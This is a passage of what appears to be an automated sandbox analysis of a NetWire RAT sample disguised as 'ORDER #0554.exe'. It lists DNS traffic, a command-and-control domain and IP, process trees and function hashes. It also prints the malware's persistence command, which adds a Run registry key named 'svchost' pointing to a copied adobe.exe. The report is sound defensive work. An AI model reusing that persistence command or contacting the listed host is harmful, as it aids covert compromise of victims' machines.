Jan 7, 2021 15:28:19.994533062 CET	60831	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:20.053451061 CET	53	60831	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:21.129455090 CET	60100	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:21.180304050 CET	53	60100	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:22.137947083 CET	53195	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:22.194395065 CET	53	53195	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:23.394402027 CET	50141	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:23.453577995 CET	53	50141	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:24.677402973 CET	53023	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:24.725382090 CET	53	53023	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:26.996577024 CET	49563	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:27.044469118 CET	53	49563	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:28.277297974 CET	51352	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:28.325289965 CET	53	51352	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:29.519484997 CET	59349	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:29.567385912 CET	53	59349	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:30.632822990 CET	57084	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:30.680708885 CET	53	57084	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:31.863639116 CET	58823	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:31.911509037 CET	53	58823	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:33.068017960 CET	57568	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:33.116173983 CET	53	57568	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:34.270473957 CET	50540	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:34.329761028 CET	53	50540	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:51.069005013 CET	54366	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:51.140826941 CET	53	54366	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:52.873519897 CET	53034	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:52.921322107 CET	53	53034	8.8.8.8	192.168.2.3
Jan 7, 2021 15:28:57.732575893 CET	57762	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:28:57.795572042 CET	53	57762	8.8.8.8	192.168.2.3
Jan 7, 2021 15:29:08.711884022 CET	55435	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:29:08.768068075 CET	53	55435	8.8.8.8	192.168.2.3
Jan 7, 2021 15:29:09.729990005 CET	50713	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:29:09.789299965 CET	53	50713	8.8.8.8	192.168.2.3
Jan 7, 2021 15:29:09.876176119 CET	56132	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:29:09.926911116 CET	53	56132	8.8.8.8	192.168.2.3
Jan 7, 2021 15:29:10.023833036 CET	58987	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:29:10.080261946 CET	53	58987	8.8.8.8	192.168.2.3
Jan 7, 2021 15:29:20.288760900 CET	56579	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:29:20.348912001 CET	53	56579	8.8.8.8	192.168.2.3
Jan 7, 2021 15:29:25.992595911 CET	60633	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:29:26.058947086 CET	53	60633	8.8.8.8	192.168.2.3
Jan 7, 2021 15:29:28.267044067 CET	61292	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:29:28.325851917 CET	53	61292	8.8.8.8	192.168.2.3
Jan 7, 2021 15:29:49.689378023 CET	63619	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:29:49.739026070 CET	53	63619	8.8.8.8	192.168.2.3
Jan 7, 2021 15:29:50.256215096 CET	64938	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:29:50.312763929 CET	53	64938	8.8.8.8	192.168.2.3
Jan 7, 2021 15:30:13.414846897 CET	61946	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:30:13.465702057 CET	53	61946	8.8.8.8	192.168.2.3
Jan 7, 2021 15:30:53.119622946 CET	64910	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:30:53.327759027 CET	53	64910	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:12.156678915 CET	52123	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:12.216034889 CET	53	52123	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:13.128856897 CET	56130	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:13.188173056 CET	53	56130	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:13.897634983 CET	56338	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:13.954199076 CET	53	56338	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:14.439135075 CET	59420	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:14.495232105 CET	53	59420	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:15.143771887 CET	58784	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:15.191679955 CET	53	58784	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:15.866131067 CET	63978	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:15.922297955 CET	53	63978	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:16.866442919 CET	62938	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:17.869194984 CET	62938	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:18.546204090 CET	53	62938	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:18.546358109 CET	53	62938	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:19.697444916 CET	55708	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:19.753773928 CET	53	55708	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:20.974384069 CET	56803	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:21.022423029 CET	53	56803	8.8.8.8	192.168.2.3
Jan 7, 2021 15:31:21.542479992 CET	57145	53	192.168.2.3	8.8.8.8
Jan 7, 2021 15:31:21.590450048 CET	53	57145	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 7, 2021 15:30:53.119622946 CET	192.168.2.3	8.8.8.8	0x3f09	Standard query (0)	chongmei33.myddns.rocks	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 7, 2021 15:30:53.327759027 CET	8.8.8.8	192.168.2.3	0x3f09	No error (0)	chongmei33.myddns.rocks		37.120.208.37	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ORDER #0554.exe PID: 6756 Parent PID: 5648

General

Start time:	15:28:24
Start date:	07/01/2021
Path:	C:\Users\user\Desktop\ORDER #0554.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ORDER #0554.exe'
Imagebase:	0x830000
File size:	860672 bytes
MD5 hash:	73CDB5F235B14379247B9F0E938E24DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000000.00000002.384637956.000000000474D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000000.00000002.384438486.0000000004684000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: cmd.exe PID: 6856 Parent PID: 6756

General

Start time:	15:28:26
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6868 Parent PID: 6856

General

Start time:	15:28:26
Start date:	07/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: reg.exe PID: 6908 Parent PID: 6856

General

Start time:	15:28:27
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe'
Imagebase:	0x1310000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: adobe.exe PID: 3180 Parent PID: 6756

General

Start time:	15:29:42
Start date:	07/01/2021
Path:	C:\Users\user\adobe.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\adobe.exe'
Imagebase:	0x7d0000
File size:	860672 bytes
MD5 hash:	73CDB5F235B14379247B9F0E938E24DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000016.00000002.604899251.0000000004814000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000016.00000002.605006899.00000000048DD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000016.00000002.598003889.0000000002EF9000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low

Analysis Process: AddInProcess32.exe PID: 4656 Parent PID: 3180

General

Start time:	15:30:47
Start date:	07/01/2021
Path:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase:	0x440000
File size:	42080 bytes
MD5 hash:	F2A47587431C466535F3C3D3427724BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Analysis Process: ORDER #0554.exe PID: 6756 Parent PID: 5648 ORDER #0554.exeCOMMON

Executed Functions

Function 0119AE29, Relevance: 3.2, Strings: 2, Instructions: 650COMMON

Download Yara Rule

Strings

<, xrefs: 0119AF5D
@, xrefs: 0119B73D

Memory Dump Source

Source File: 00000000.00000002.382212692.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: false

Similarity

API ID:
String ID: <$@
API String ID: 0-1426351568
Opcode ID: 379bfab2baaa91afbd1c59197ec1093b1549579e2a562b4a613c38b806716c81
Instruction ID: 12afe3b3f9b953187118b272d476fcef5b8cf8f9534d916fd5d8bf41cb7203e3
Opcode Fuzzy Hash: 379bfab2baaa91afbd1c59197ec1093b1549579e2a562b4a613c38b806716c81
Instruction Fuzzy Hash: 5162CDB4E00219CFDB68CFA9D984A9DFBF6BF48314F19C1A9D418AB211D730A981CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0119E708, Relevance: 2.2, Strings: 1, Instructions: 987COMMON

Download Yara Rule

Strings

ntin, xrefs: 0119F177

Memory Dump Source

Source File: 00000000.00000002.382212692.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: false

Similarity

API ID:
String ID: ntin
API String ID: 0-3077571345
Opcode ID: f90c324612f1b0c86c7056af37b9460b839c594e2ed442b584dd64dce9d1a96c
Instruction ID: 344b456a919a2dc670ccefda3c2a82bd6ef2e1ef900e97f515169a3bb009764e
Opcode Fuzzy Hash: f90c324612f1b0c86c7056af37b9460b839c594e2ed442b584dd64dce9d1a96c
Instruction Fuzzy Hash: 19A2F474E00219CFDB18CF99C981BDDBBF6BF89314F298099D518AB255D730A982CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0522DAFD, Relevance: 1.8, APIs: 1, Instructions: 263COMMON

Download Yara Rule

APIs

CopyFileExW.KERNELBASE(?,?,?,?,?,?), ref: 0522DDA9

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 2664af3a11a9d1135b222d9ae73698c8b1702670b6883c8a1b7cc27f60755b26
Instruction ID: b1e446c6267ca4da5a3f0d3f78cec79e33d9b93c86e31034a8e87e8c842e03d6
Opcode Fuzzy Hash: 2664af3a11a9d1135b222d9ae73698c8b1702670b6883c8a1b7cc27f60755b26
Instruction Fuzzy Hash: 48B10174E14229DFDB24CFA9C881BDEBBB2BF49304F1481A9E409B7251D774A986CF44

Uniqueness

Uniqueness Score: -1.00%

Function 011987D8, Relevance: .9, Instructions: 879COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382212692.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02536869f999a6e9bf1bdedcafed29bb2d4fc14e3aa50c523552417daead406a
Instruction ID: a52d38fed911de88f54e07807e8a653ea320e542cec552b71beb0e15401146cb
Opcode Fuzzy Hash: 02536869f999a6e9bf1bdedcafed29bb2d4fc14e3aa50c523552417daead406a
Instruction Fuzzy Hash: 2A828D70A00209DFCF19CF68C884AAEBBF6FF89314F158569E5259B2A5D731EC81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0119CC49, Relevance: .5, Instructions: 511COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382212692.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3ca3417f781fb9c5579abe90cf04911a5e35268790763b542a615d4a2e2e41
Instruction ID: 8b4c1bdfac1846caac988eeffc3074a20d49ce2d70c57fda288151e5bc11cc45
Opcode Fuzzy Hash: 0c3ca3417f781fb9c5579abe90cf04911a5e35268790763b542a615d4a2e2e41
Instruction Fuzzy Hash: 59429074E11229CFDB24CFA9C984B9DBBB6BF48310F1481A9D819A7355D731AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0119B91F, Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382212692.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a03981c8e7f9abea8710d451aec30931546afb9b8ffe2bf4d6a4709710e51bd4
Instruction ID: 894dc1ccee1cd0e9c2e85b9c20b0943f39d0a1c8f51919535902df7fdd05f2e4
Opcode Fuzzy Hash: a03981c8e7f9abea8710d451aec30931546afb9b8ffe2bf4d6a4709710e51bd4
Instruction Fuzzy Hash: 2432F174900218CFDB64DFA9C984A8DFBFABF48259F19C599C418AB211CB30DD81CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0522001A, Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f9658f459edce633f84b1bff922e7002216f81fe0430255ec2a49bb743067f
Instruction ID: 15b6ef7640092ca7bf80b64db1a1f81e52fc1f2f1136859222b67e49be1a67d7
Opcode Fuzzy Hash: c0f9658f459edce633f84b1bff922e7002216f81fe0430255ec2a49bb743067f
Instruction Fuzzy Hash: AB22C074A01228CFDB69DF74D8587ADBBB2FF49305F1084AAD40AA7254DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05220040, Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b6ac2014ddd1b6dbc4cf2544c858986823c785c2e0b79a8e8394c3dec6f50e
Instruction ID: daebeebdae3effe883f4a11f0a87f294a8a0906a99fee880a52cae29845dbb2c
Opcode Fuzzy Hash: 44b6ac2014ddd1b6dbc4cf2544c858986823c785c2e0b79a8e8394c3dec6f50e
Instruction Fuzzy Hash: B722BE74E01228CFDB69DF75D858BADBBB2BF49301F1084AAD40AA7254DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 01194CB0, Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382212692.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62bf94d671aa684fd8c591ab3e1b7e45af0c8f6014f017caeac66f178b73ce8e
Instruction ID: af8278b8ff3073d2599f19027e60b9825e236fc0122f1824ad172fbf7ed37ad7
Opcode Fuzzy Hash: 62bf94d671aa684fd8c591ab3e1b7e45af0c8f6014f017caeac66f178b73ce8e
Instruction Fuzzy Hash: 0002A070B002198FDB19DF68C854BAEBBF6BF88304F258569E515EB391DF359C428B90

Uniqueness

Uniqueness Score: -1.00%

Function 01195418, Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382212692.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84925b74b16541e3eb0c90feff470bd9f18f3f7485953a4f3af976e28e17a12e
Instruction ID: 907a127b47a9e3558faa210510cdd2e61a43e632af768fb27174520e92f17129
Opcode Fuzzy Hash: 84925b74b16541e3eb0c90feff470bd9f18f3f7485953a4f3af976e28e17a12e
Instruction Fuzzy Hash: ECD12B30A01109DFDF9ACFA9D884AADBBB7BF48304F558066E925BB261D730E941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0522C958, Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702110651c6af7586c953baf0d95e5836567ff048266b1905eaf9ba226777082
Instruction ID: 3ad5b5177820139c82008627190447aa9c9c928c0f16159521161ecffff9ed42
Opcode Fuzzy Hash: 702110651c6af7586c953baf0d95e5836567ff048266b1905eaf9ba226777082
Instruction Fuzzy Hash: BFD1D078D15228DFDB25CFA5D984B9DBBF2BF49301F2081AAD409A7358DB345A85CF04

Uniqueness

Uniqueness Score: -1.00%

Function 05220928, Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538b6c2dbe44117fc98aff44f27844eab284517fc30afe5fa64460904c3d9381
Instruction ID: e8c34c6b2834e79795ef25fd468eddd1aa5a5b0258b2902d461df4da791fa578
Opcode Fuzzy Hash: 538b6c2dbe44117fc98aff44f27844eab284517fc30afe5fa64460904c3d9381
Instruction Fuzzy Hash: E5E1A078E00218CFDB64DFA9D988B9DBBB2FF88304F1085AAD449A7255DB305E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05229960, Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d37cb4c04c363cbc0099fd3e016422711580d6c21086c60d57adf4ebe64e1415
Instruction ID: f023a6e5b039b316450835465f129c6cc6a5978685c925c10a5676b9482892ed
Opcode Fuzzy Hash: d37cb4c04c363cbc0099fd3e016422711580d6c21086c60d57adf4ebe64e1415
Instruction Fuzzy Hash: 3381AF35B242149FCB08EB7598557BE76B7AFC8304F19882E940BE7394DF348C858B95

Uniqueness

Uniqueness Score: -1.00%

Function 05226AA0, Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 678e274dbe95195d157f0cb447927727602ad97ee1312467b6ac6c17de10dbbb
Instruction ID: 872b81805fb1d46b18548960204fde011739034e151ae5f511581b66fb27eadf
Opcode Fuzzy Hash: 678e274dbe95195d157f0cb447927727602ad97ee1312467b6ac6c17de10dbbb
Instruction Fuzzy Hash: 59B1C375E102288FDB14DFA9C844ADDFBB2BF89314F24C1A9D419AB355EB30A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05227D20, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64292be1eff42f99465faa3b3179f637f2edd7ce343321c840079243f4011ea
Instruction ID: 29aac4453eeb7b830736707e153aa4c2b761dd362d4b37470c457117b41e1c10
Opcode Fuzzy Hash: e64292be1eff42f99465faa3b3179f637f2edd7ce343321c840079243f4011ea
Instruction Fuzzy Hash: 5151DBB8D082189FCB14CFA8C584ADEBBF5FF09304F24942AE519AB250DB34A949CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0522C2C8, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a6ac66934a5959d8a2c3bad58161de25cc9a31d5d78c7bd9ee5a4a0f685b3e
Instruction ID: 392b488b0f3f5a4bcaa2b090b0eda816fb4f38693efd49b74bf1977850e3ff57
Opcode Fuzzy Hash: b4a6ac66934a5959d8a2c3bad58161de25cc9a31d5d78c7bd9ee5a4a0f685b3e
Instruction Fuzzy Hash: 72510178D15228EFDB18CFA5D4887EDBBB2BF49304F248029E405BB294C7759A86CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0522C2B8, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f12afe6f189bbe90913b14bf2007906b7e1a3dab07520f043afa9e218b7be19
Instruction ID: 2f1b116f560148800eb6f0296282e5baed9cd8b47fef888e21ea4fc8207ffe2a
Opcode Fuzzy Hash: 9f12afe6f189bbe90913b14bf2007906b7e1a3dab07520f043afa9e218b7be19
Instruction Fuzzy Hash: 85411274D15228EFDB18CFA4D4987EEBBB2FF49304F245029D405BB290C7754A86CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05227090, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ac1cfb5861b543efdeebb10ed2241cb3e9b7db9c791048b08f827821304c0e
Instruction ID: a89de12ff3f002e537d9e401f6eea60b8c5950a3483bd9280e99be3d4baf1db1
Opcode Fuzzy Hash: 92ac1cfb5861b543efdeebb10ed2241cb3e9b7db9c791048b08f827821304c0e
Instruction Fuzzy Hash: 4B41AAB8D04218AFDB14CFA9C584ADEBBF5FF09304F24902AE519BB250D774A949CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05225527, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 285326ff2b2f628f2d0f42e32bbb51de8c8025f39157d87789231e5376afd986
Instruction ID: 02833a8a9cd7eae5739a6e15d42edbda4a4b39f81bcac8b03225f32c2b5bb160
Opcode Fuzzy Hash: 285326ff2b2f628f2d0f42e32bbb51de8c8025f39157d87789231e5376afd986
Instruction Fuzzy Hash: A541BBB4D152589FDB10CFA9C584ADDBBF0BF09304F24906AE418BB260CB74A949CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05224F58, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e91a70e63411fb390b80d64229766a63d7e2dcee9c6cfc4ebcd71fe4502d1ed
Instruction ID: 7c2f0622cd25bc1b004abad1303b9f4e5a035efd7a4b181a4eace4a536b2de06
Opcode Fuzzy Hash: 2e91a70e63411fb390b80d64229766a63d7e2dcee9c6cfc4ebcd71fe4502d1ed
Instruction Fuzzy Hash: DF41BCB4D142189FDB10CFA9D584BEEBBF5BF09304F20942AE415BB250DB74A949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05225A0C, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e57162e5a1778641ff6747a52bee835a653f8a21dd7ba7b57626e29ed28cbe
Instruction ID: 838fcf030edf55e4ab5cb9aaa3c4712cdcc5fd2b6fb5b72a13ae74980be24e7f
Opcode Fuzzy Hash: a7e57162e5a1778641ff6747a52bee835a653f8a21dd7ba7b57626e29ed28cbe
Instruction Fuzzy Hash: F7317CB8D05219AFCB14CFA9D5846EDBBF2FF49310F24912AE819AB250C7349945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05225A18, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85e45d0b41457f7219ae1d71db39de3e544ad7b7d4d03f23e1456a4e6140d02
Instruction ID: 515297425a288f6eff73660d383efd674a6b6d7510417664e9b8e9dad0b03314
Opcode Fuzzy Hash: e85e45d0b41457f7219ae1d71db39de3e544ad7b7d4d03f23e1456a4e6140d02
Instruction Fuzzy Hash: 01316AB8E05219AFCB18CFA9D485AADBBF2BF49310F249129E818BB350D7349941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0522EE20, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64ba9371260b34f825d5fcc8f4332df90f9993b0b927b031069f9256d132d68
Instruction ID: c12a60ae84e60c5e519e5f9dc90113ab66d1870aa71acaa9d4a3165e0fa3398d
Opcode Fuzzy Hash: e64ba9371260b34f825d5fcc8f4332df90f9993b0b927b031069f9256d132d68
Instruction Fuzzy Hash: 05214475D102298FCF18DFA4C8187EEBBB9BF4A305F00542AC016B3290CB790A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0522EE1B, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12cb75e69186e3c3a4a16c97505906a1af002a2da5dd299d0132d0c93463a432
Instruction ID: 8e1d857053c1de0c73ab45daad7f0df492cedf37105d3b47959845845dc29d6a
Opcode Fuzzy Hash: 12cb75e69186e3c3a4a16c97505906a1af002a2da5dd299d0132d0c93463a432
Instruction Fuzzy Hash: 37210475E142298FCF18DFA4D8587EEBBB5BF89315F00542AD016B32A0CB790A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05225D2C, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.387143032.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65576885d95f4634b730227becdfd05a88732fe4aaee6fc10ef24e60cf3f7845
Instruction ID: 9de6ec63a90f4f541780371e6eed0c06166ff1412c1c2e2e518796bab00dad6b
Opcode Fuzzy Hash: 65576885d95f4634b730227becdfd05a88732fe4aaee6fc10ef24e60cf3f7845
Instruction Fuzzy Hash: 9521E778D04219EFDB14CFA9C4446EDBBB1BF4A310F24E169E825BB290C7348942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05225D38, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

